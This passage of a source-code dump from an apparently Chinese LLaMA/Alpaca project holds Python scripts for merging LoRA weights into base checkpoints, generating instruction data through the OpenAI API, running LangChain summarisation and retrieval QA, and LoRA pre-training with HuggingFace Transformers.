dim=0) # 13B: size_list == [24976,24977] elif new_k=='norm.weight': splits = [v] * num_shards elif 'ffn_norm.weight' in new_k: splits = [v] * num_shards elif 'attention_norm.weight' in new_k: splits = [v] * num_shards elif 'w1.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif 'w2.weight' in new_k: splits = v.split(v.size(1)//num_shards,dim=1) elif 'w3.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif 'wo.weight' in new_k: splits = v.split(v.size(1)//num_shards,dim=1) elif 'wv.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif "wq.weight" in new_k or "wk.weight" in new_k: v = unpermute(v) splits = v.split(v.size(0)//num_shards,dim=0) else: print(f"Unexpected key {new_k}") raise ValueError if verbose: print(f"Processing {new_k}") for sd,split in zip(new_state_dicts,splits): sd[new_k] = split.clone() del 
split del splits del model_sd[k],v gc.collect() # Effectively enforce garbage collection os.makedirs(output_dir, exist_ok=True) for i,new_state_dict in enumerate(new_state_dicts): print(f"Saving shard {i+1} of {num_shards} into {output_dir}/{prefix}consolidated.0{i}.pth") torch.save(new_state_dict, output_dir + f"/{prefix}consolidated.0{i}.pth") def merge_shards(output_dir, num_shards: int): ckpt_filenames = sorted([f for f in os.listdir(output_dir) if re.match('L(\d+)-consolidated.(\d+).pth',f)]) for i in range(num_shards): shards_filenames = sorted([f for f in ckpt_filenames if re.match(f'L(\d+)-consolidated.0{i}.pth',f)]) print(f"Loading {shards_filenames} ...") shards_dicts = [torch.load(os.path.join(output_dir,fn)) for fn in shards_filenames] shards_merged = {} for d in shards_dicts: shards_merged |= d print(f"Saving the merged shard to " + os.path.join(output_dir, f"consolidated.0{i}.pth")) torch.save(shards_merged, os.path.join(output_dir, f"consolidated.0{i}.pth")) print("Cleaning up...") del shards_merged for d in shards_dicts: del d del shards_dicts gc.collect() # Effectively enforce garbage collection for fn in shards_filenames: os.remove(os.path.join(output_dir,fn)) if __name__=='__main__': args = parser.parse_args() base_model_path = args.base_model lora_model_paths = [s.strip() for s in args.lora_model.split(',') if len(s.strip())!=0] output_dir = args.output_dir output_type = args.output_type os.makedirs(output_dir, exist_ok=True) print(f"Base model: {base_model_path}") print(f"LoRA model(s) {lora_model_paths}:") tokenizers_and_loras = [] for lora_model_path in lora_model_paths: print(f"Loading {lora_model_path}") if not os.path.exists(lora_model_path): print("Cannot find lora model on the disk. Downloading lora model from hub...") lora_model_path = snapshot_download(repo_id=lora_model_path) tokenizer = LlamaTokenizer.from_pretrained(lora_model_path) lora_config = peft.LoraConfig.from_pretrained(lora_model_path) lora_state_dict = torch.load(os.path.join(lora_model_path,'adapter_model.bin'),map_location='cpu') if 'base_model.model.model.embed_tokens.weight' in lora_state_dict: lora_vocab_size = lora_state_dict['base_model.model.model.embed_tokens.weight'].shape[0] assert lora_vocab_size==len(tokenizer), \ (f"The vocab size of the tokenizer {len(tokenizer)} does not match the vocab size of the LoRA weight {lora_vocab_size}.\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") tokenizers_and_loras.append( { "tokenizer" :tokenizer, "state_dict" :lora_state_dict, "config": lora_config, "scaling": lora_config.lora_alpha / lora_config.r, "fan_in_fan_out" : lora_config.fan_in_fan_out, }) if len(tokenizers_and_loras)==2: t1_vocab_size = len(tokenizers_and_loras[0]["tokenizer"]) t2_vocab_size = len(tokenizers_and_loras[1]["tokenizer"]) assert t1_vocab_size<=t2_vocab_size, \ (f"The vocab size of the first tokenizer is {t1_vocab_size}\n" f"The vocab size of the second tokenizer is {t2_vocab_size}, found to be smaller than {t1_vocab_size}\n" "This is not the intended use. Please check your model and tokenizer.") if not os.path.exists(base_model_path): print("Cannot find lora model on the disk. 
Downloading lora model from hub...") base_model_path = snapshot_download(repo_id=base_model_path) ckpt_filenames = sorted([f for f in os.listdir(base_model_path) if re.match('pytorch_model-(\d+)-of-(\d+).bin',f)]) embedding_size = None model_size = None total_size = 0 for index, filename in enumerate(ckpt_filenames): print(f"Loading ckpt {filename}") state_dict = torch.load(os.path.join(base_model_path,filename), map_location='cpu') if index == 0: embedding_size = state_dict['model.embed_tokens.weight'].shape[1] model_size = emb_to_model_size[embedding_size] if output_type=='pth': params = params_of_models[model_size] num_shards = num_shards_of_models[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) print("Merging...") for k in state_dict: for tl_idx, t_and_l in enumerate(tokenizers_and_loras): saved_key = 'base_model.model.'+k lora_key_A = saved_key.replace('.weight','.lora_A.weight') if saved_key in t_and_l['state_dict']: if args.verbose: print(f"copying {saved_key} from {tl_idx}-th LoRA weight to {k}") state_dict[k] = t_and_l['state_dict'][saved_key].half().clone() # do we need half()? if lora_key_A in t_and_l['state_dict']: lora_key_B = lora_key_A.replace('lora_A.weight','lora_B.weight') if args.verbose: print(f"merging {lora_key_A} and lora_B.weight form {tl_idx}-th LoRA weight to {k}") state_dict[k] += ( transpose( t_and_l['state_dict'][lora_key_B].float() @ t_and_l['state_dict'][lora_key_A].float(), t_and_l['fan_in_fan_out']) * t_and_l['scaling'] ) weight_size = state_dict[k].numel() * dtype_byte_size(state_dict[k].dtype) total_size += weight_size if output_type=='huggingface': print(f"Saving ckpt {filename} to {output_dir} in HF format...") torch.save(state_dict,os.path.join(output_dir, filename)) elif output_type=='pth': print(f"Converting to pth format...") save_shards(model_sd=state_dict, num_shards=num_shards,prefix=f"L{index+1}-", verbose=args.verbose) del state_dict gc.collect() # Effectively enforce garbage collection print(f"Saving tokenizer") tokenizers_and_loras[-1]['tokenizer'].save_pretrained(output_dir) if output_type == 'pth': with open(output_dir + "/params.json", "w") as f: print(f"Saving params.json into {output_dir}/params.json") json.dump(params, f) merge_shards(output_dir, num_shards=num_shards) if output_type=='huggingface': configs = ('config.json', 'generation_config.json', 'pytorch_model.bin.index.json') for config in configs: if os.path.exists(os.path.join(base_model_path, config)): print(f"Saving {config}") with open(os.path.join(base_model_path, config),'r') as f: obj = json.load(f) if config=='config.json': obj['vocab_size'] = len(tokenizers_and_loras[-1]['tokenizer']) if config=='pytorch_model.bin.index.json': obj['metadata']['total_size'] = total_size with open(os.path.join(output_dir, config), 'w') as f: json.dump(obj, f, indent=2) print("Done.") File: scripts/crawl_prompt.py import openai import sys import random openai.api_key = "" # you must provide your OpenAI API key before crawling if not openai.api_key: raise ValueError("OpenAI API key not provided. 
Please set the 'openai.api_key' variable.") def return_random_prompt(): system_prompt = "你需要尽可能给出多样化的任务指令和对应的回答。我们将用于人工评估ChatGPT模型对指令的完成情况。要求:\n" # generate random topics topic_list = ["科技", "娱乐", "体育", "金融", "时政", "教育", "医疗", "旅游", "美食", "汽车", "房产", "文化", "历史", "地理", "自然", "人文", "社会", "法律", "军事", "政治", "经济", "文学", "艺术", "宗教", "哲学", "语言", "数学", "物理", "化学", "生物", "地球科学", "天文学", "计算机科学", "工程", "建筑", "设计", "音乐", "舞蹈", "电影", "电视", "动漫", "游戏", "健康", "美容", "时尚", "家居", "家电", "家具", "家装", "母婴", "育儿", "职场", "工作", "生活", "养生", "心理", "情感", "人际", "社交", "交友", "恋爱", "婚姻", "家庭", "亲子", "宠物", "动物", "植物", "食品", "饮料", "餐饮", "酒店", "购物", "消费", "理财", "税务", "法规", "法院", "司法", "刑事", "民事", "行政", "战争"] system_prompt += "1. 主题多样化,涵盖各个领域,例如:" + "、".join(random.sample(topic_list, 10)) + "等。\n" # generate random tasks task_list = ["开放式生成", "分类", "问答", "编辑", "摘要", "写作", "翻译", "写代码", "分析", "代码解析", "常识推理", "写信", "抽取", "推荐"] system_prompt += "2. 表述多样化,结合真实问题;指令类型多样化,例如:" + "、".join(random.sample(task_list, 10)) + "等。\n" # other requirements system_prompt += "3. 如果遇到无法处理的指令(只靠文本无法回答),给出无法处理的回复。\n" system_prompt += "4. 除非特别要求,请使用中文,指令可以是命令句、疑问句、或其他合适的类型。\n" system_prompt += "5. 为指令生成一个适当且涉及真实情况的<input>,不应该只包含简单的占位符。<input>应提供实质性的内容,具有挑战性。字数不超过" + str(random.randint(80, 120)) + "字。\n" system_prompt += "6. <output>应该是对指令的适当且真实的回应,不能只回复答应或拒绝请求。如果需要额外信息才能回复时,请努力预测用户意图并尝试回复。<output>的内容应少于" + str(random.randint(128, 512)) + "字。\n\n" system_prompt += "请给出满足条件的20条JSON格式数据:\n" return system_prompt if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python crawl_prompt.py <output_file>") exit(1) output_file = open(sys.argv[1], 'w') MAX_EPOCHS = 1 # number of data to generate (each prompt contains 20 JSON-formatted data) for k in range(MAX_EPOCHS): response = openai.ChatCompletion.create( model="gpt-3.5-turbo", # here we use `gpt-3.5-turbo` model, while Stanford-Alpaca uses `text-davinci-003` messages=[ {"role": "user", "content": return_random_prompt()}, ] ) output_file.write(response["choices"][0]["message"]["content"] + '\n') output_file.close() File: scripts/langchain/langchain_sum.py import argparse import os parser = argparse.ArgumentParser() parser.add_argument('--file_path',required=True,type=str) parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--chain_type', default="refine", type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # os.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION']='python' file_path = args.file_path model_path = args.model_path import torch from langchain import HuggingFacePipeline from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.prompts import PromptTemplate from langchain.chains.summarize import load_summarize_chain prompt_template = ("Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n请为以下文字写一段摘要:\n{text}\n\n### Response: ") refine_template = ( "Below is an instruction that describes a task." 
"Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "已有一段摘要:{existing_answer}\n" "现在还有一些文字,(如果有需要)你可以根据它们完善现有的摘要。" "\n" "{text}\n" "\n" "如果这段文字没有用,返回原来的摘要即可。请你生成一个最终的摘要。" "\n\n### Response: " ) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') text_splitter = RecursiveCharacterTextSplitter(chunk_size=600, chunk_overlap=100, length_function=len) with open(file_path) as f: text = f.read() docs = text_splitter.create_documents([text]) print("loading LLM...") model = HuggingFacePipeline.from_model_id(model_id=model_path, task="text-generation", model_kwargs={ "torch_dtype" : load_type, "low_cpu_mem_usage" : True, "temperature": 0.2, "max_length": 1000, "device_map": "auto", "repetition_penalty":1.1} ) PROMPT = PromptTemplate(template=prompt_template, input_variables=["text"]) REFINE_PROMPT = PromptTemplate( template=refine_template,input_variables=["existing_answer", "text"], ) if args.chain_type == "stuff": chain = load_summarize_chain(model, chain_type="stuff", prompt=PROMPT) elif args.chain_type == "refine": chain = load_summarize_chain(model, chain_type="refine", question_prompt=PROMPT, refine_prompt=REFINE_PROMPT) print(chain.run(docs)) File: scripts/langchain/langchain_qa.py import argparse import os parser = argparse.ArgumentParser() parser.add_argument('--file_path',required=True,type=str) parser.add_argument('--embedding_path',required=True,type=str) parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--chain_type', default="refine", type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # os.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION']='python' file_path = args.file_path embedding_path = args.embedding_path model_path = args.model_path import torch from langchain import HuggingFacePipeline from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.vectorstores import FAISS from langchain.document_loaders import TextLoader from langchain.prompts import PromptTemplate from langchain.chains import RetrievalQA from langchain.embeddings.huggingface import HuggingFaceEmbeddings prompt_template = ("Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{context}\n{question}\n\n### Response: ") refine_prompt_template = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "这是原始问题: {question}\n" "已有的回答: {existing_answer}\n" "现在还有一些文字,(如果有需要)你可以根据它们完善现有的回答。" "\n\n" "{context_str}\n" "\\nn" "请根据新的文段,进一步完善你的回答。\n\n" "### Response: " ) initial_qa_template = ( "Below is an instruction that describes a task. 
" "Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "以下为背景知识:\n" "{context_str}" "\n" "请根据以上背景知识, 回答这个问题:{question}。\n\n" "### Response: " ) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') loader = TextLoader(file_path) documents = loader.load() text_splitter = RecursiveCharacterTextSplitter( chunk_size=600, chunk_overlap=100) texts = text_splitter.split_documents(documents) print("Loading the embedding model...") embeddings = HuggingFaceEmbeddings(model_name=embedding_path) docsearch = FAISS.from_documents(texts, embeddings) print("loading LLM...") model = HuggingFacePipeline.from_model_id(model_id=model_path, task="text-generation", model_kwargs={ "torch_dtype" : load_type, "low_cpu_mem_usage" : True, "temperature": 0.2, "max_length": 1000, "device_map": "auto", "repetition_penalty":1.1} ) if args.chain_type == "stuff": PROMPT = PromptTemplate( template=prompt_template, input_variables=["context", "question"] ) chain_type_kwargs = {"prompt": PROMPT} qa = RetrievalQA.from_chain_type( llm=model, chain_type="stuff", retriever=docsearch.as_retriever(search_kwargs={"k": 1}), chain_type_kwargs=chain_type_kwargs) elif args.chain_type == "refine": refine_prompt = PromptTemplate( input_variables=["question", "existing_answer", "context_str"], template=refine_prompt_template, ) initial_qa_prompt = PromptTemplate( input_variables=["context_str", "question"], template=initial_qa_template, ) chain_type_kwargs = {"question_prompt": initial_qa_prompt, "refine_prompt": refine_prompt} qa = RetrievalQA.from_chain_type( llm=model, chain_type="refine", retriever=docsearch.as_retriever(search_kwargs={"k": 1}), chain_type_kwargs=chain_type_kwargs) while True: query = input("请输入问题:") if len(query.strip())==0: break print(qa.run(query)) File: scripts/training/run_clm_pt_with_peft.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. 
import logging import numpy as np import math import os import sys from dataclasses import dataclass, field from itertools import chain from typing import Optional, List, Dict, Any, Mapping from pathlib import Path import datasets import torch from datasets import load_dataset, concatenate_datasets import transformers from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM, LlamaTokenizer, AutoTokenizer, HfArgumentParser, Trainer, TrainingArguments, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import send_example_telemetry from transformers.utils.versions import require_version from sklearn.metrics import accuracy_score from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR class SavePeftModelCallback(transformers.TrainerCallback): def save_model(self, args, state, kwargs): if state.best_model_checkpoint is not None: checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model") else: checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}") peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def on_save(self, args, state, control, **kwargs): self.save_model(args, state, kwargs) return control def on_train_end(self, args, state, control, **kwargs): peft_model_path = os.path.join(args.output_dir, "pt_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def accuracy(predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) preds = preds[:, :-1].reshape(-1) return accuracy(predictions=preds, references=labels) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) def fault_tolerance_data_collator(features: List) -> Dict[str, Any]: if not isinstance(features[0], Mapping): features = [vars(f) for f in features] first = features[0] batch = {} # Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) 
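# In practice: a scalar "label" becomes a 1-D labels tensor (torch.long for
# ints, torch.float otherwise), while "label_ids" sequences are stacked if
# they are already tensors or converted with an inferred dtype.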
if "label" in first and first["label"] is not None: label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"] dtype = torch.long if isinstance(label, int) else torch.float batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype) elif "label_ids" in first and first["label_ids"] is not None: if isinstance(first["label_ids"], torch.Tensor): batch["labels"] = torch.stack([f["label_ids"] for f in features]) else: dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype) # Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. try: for k, v in first.items(): if k not in ("label", "label_ids") and v is not None and not isinstance(v, str): if isinstance(v, torch.Tensor): batch[k] = torch.stack([f[k] for f in features]) elif isinstance(v, np.ndarray): batch[k] = torch.tensor(np.stack([f[k] for f in features])) else: batch[k] = torch.tensor([f[k] for f in features]) except ValueError: # quick fix by simply take the first example for k, v in first.items(): if k not in ("label", "label_ids") and v is not None and not isinstance(v, str): if isinstance(v, torch.Tensor): batch[k] = torch.stack([features[0][k]] * len(features)) elif isinstance(v, np.ndarray): batch[k] = torch.tensor(np.stack([features[0][k]] * len(features))) else: batch[k] = torch.tensor([features[0][k]] * len(features)) return batch MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) tokenizer_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The tokenizer for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." 
) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_dir: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[float] = field( default=0.05, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"}) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") @dataclass class MyTrainingArguments(TrainingArguments): trainable : Optional[str] = field(default="q_proj,v_proj") lora_rank : Optional[int] = field(default=8) lora_dropout : Optional[float] = field(default=0.1) lora_alpha : Optional[float] = field(default=32.) 
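# Note: the effective LoRA scaling factor is lora_alpha / lora_rank
# (4.0 with these defaults of 32 / 8), matching the "scaling" value
# computed in the merge script earlier in this dump.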
modules_to_save : Optional[str] = field(default=None) debug_mode : Optional[bool] = field(default=False) peft_path : Optional[str] = field(default=None) logger = logging.getLogger(__name__) def main(): parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN, handlers=[logging.StreamHandler(sys.stdout)],) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # transformers.tokenization_utils.logging.set_verbosity_warning() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. 
set_seed(training_args.seed) config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.tokenizer_name_or_path: tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) # Preprocessing the datasets. # First we tokenize all the texts. # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer(examples["text"]) # clm input could be much much longer than block_size if "Token indices sequence length is longer than the" in cl.out: tok_logger.warning( "^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits" " before being passed to the model." ) return output if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 1024: logger.warning( "The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value" " of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can" " override this default with `--block_size xxx`." ) block_size = 1024 else: if data_args.block_size > tokenizer.model_max_length: logger.warning( f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model" f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}." ) block_size = min(data_args.block_size, tokenizer.model_max_length) # Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size. def group_texts(examples): # Concatenate all texts. concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()} total_length = len(concatenated_examples[list(examples.keys())[0]]) # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can # customize this part to your needs. if total_length >= block_size: total_length = (total_length // block_size) * block_size # Split by chunks of max_len. 
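# For example, with block_size=4 and 10 concatenated tokens, total_length is
# trimmed to 8 and the tokens are emitted as two chunks of 4; the trailing
# remainder is discarded. "labels" is simply a copy of "input_ids" (the
# causal shift happens inside the model).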
result = { k: [t[i : i + block_size] for i in range(0, total_length, block_size)] for k, t in concatenated_examples.items() } result["labels"] = result["input_ids"].copy() return result with training_args.main_process_first(desc="dataset map tokenization and grouping"): lm_datasets = [] path = Path(data_args.dataset_dir) files = [file.name for file in path.glob("*.txt")] if training_args.debug_mode is True: files = [files[0]] for idx, file in enumerate(files): data_file = os.path.join(path, file) filename = ''.join(file.split(".")[:-1]) cache_path = os.path.join(data_args.data_cache_dir, filename) os.makedirs(cache_path, exist_ok=True) try: processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False) logger.info(f'training datasets-{filename} has been loaded from disk') except Exception: cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text") os.makedirs(cache_dir, exist_ok=True) raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False) logger.info(f"{file} has been loaded") tokenized_dataset = raw_dataset.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns="text", load_from_cache_file=True, keep_in_memory=False, cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset}, desc="Running tokenizer on dataset", ) grouped_datasets = tokenized_dataset.map( group_texts, batched=True, num_proc=data_args.preprocessing_num_workers, load_from_cache_file=True, keep_in_memory=False, cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset}, desc=f"Grouping texts in chunks of {block_size}", ) processed_dataset = grouped_datasets processed_dataset.save_to_disk(cache_path) if idx == 0: lm_datasets = processed_dataset['train'] else: assert lm_datasets.features.type == processed_dataset["train"].features.type lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]]) lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage) if training_args.do_train: train_dataset = lm_datasets['train'] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) logger.info(f"Num train_samples {len(train_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(train_dataset[0]['input_ids'])) if training_args.do_eval: eval_dataset = lm_datasets["test"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) logger.info(f"Num eval_samples {len(eval_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(eval_dataset[0]['input_ids'])) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = LlamaForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in 